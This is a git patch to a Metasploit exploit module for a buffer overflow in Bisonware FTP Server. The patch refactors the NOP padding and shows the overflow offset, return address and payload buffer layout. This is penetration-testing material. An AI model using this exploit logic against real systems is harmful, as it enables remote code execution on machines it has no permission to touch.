From 441fff4b7cad5679423437f0f946046f4fd50f43 Mon Sep 17 00:00:00 2001 From: JT Date: Mon, 23 Nov 2015 06:53:12 +0800 Subject: [PATCH] Update bison_ftp_bof.rb Adding constant NOP --- modules/exploits/windows/ftp/bison_ftp_bof.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/ftp/bison_ftp_bof.rb b/modules/exploits/windows/ftp/bison_ftp_bof.rb index 147b3949e0..e8b162a6e1 100644 --- a/modules/exploits/windows/ftp/bison_ftp_bof.rb +++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb @@ -48,7 +48,8 @@ class Metasploit4 < Msf::Exploit::Remote [ 'Bisonware FTP Server / Windows XP SP3 EN', { 'Ret' => 0x0040333f, - 'Offset' => 1028 + 'Offset' => 1028, + 'Nops' => 404 } ], ], @@ -77,9 +78,8 @@ class Metasploit4 < Msf::Exploit::Remote connect #connect for the second time buf = rand_text_alpha(target['Offset']) - buf << make_nops(16) buf << payload.encoded - buf << make_nops(388 - payload.encoded.length) + buf << make_nops( (target['Nops']) - payload.encoded.length) buf << [target.ret].pack('V') print_status('Sending payload...')